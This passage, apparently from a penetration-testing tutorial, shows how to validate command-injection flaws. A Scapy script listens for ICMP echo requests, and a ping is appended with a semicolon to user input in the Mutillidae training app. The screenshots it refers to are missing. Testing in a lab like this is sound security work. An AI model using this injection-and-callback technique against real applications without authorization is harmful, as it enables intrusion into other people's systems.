In the following steps we will be creating a custom script for validating remote code-execution vulnerabilities with ICMP traffic:
- It is possible to validate a command-injection vulnerability in a web application by executing commands that will force the backend system to send ICMP traffic to a listening service. The received ICMP echo requests can be used to identify vulnerable systems. The following is an example of a Python script that uses the Scapy library to do just that:
#!/usr/bin/python
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
def rules(pkt):
try:
if (pkt[IP].dst=="172.16.69.133") and (pkt[ICMP]):
print str(pkt[IP].src) + " is exploitable"
except:
pass
print "Listening for Incoming ICMP Traffic. Use Ctrl+C
to stop listening"
sniff(lfilter=rules,store=0)
- After the ICMP listener has been executed, we need to attempt to launch an ICMP echo request from the vulnerable server to our listening service. This can be done by injecting a ping command into the user input that is vulnerable to command injection.
- In Mutillidae, there is a vulnerable function that performs DNS enumeration by passing user input to a direct system call. A separate ping request can be appended to the user input by using a semicolon, as shown in the following screenshot:
- Assuming that the server is vulnerable to command injection, the Python listener should indicate that the ICMP echo request was received and that the target server is likely to be vulnerable, as follows:
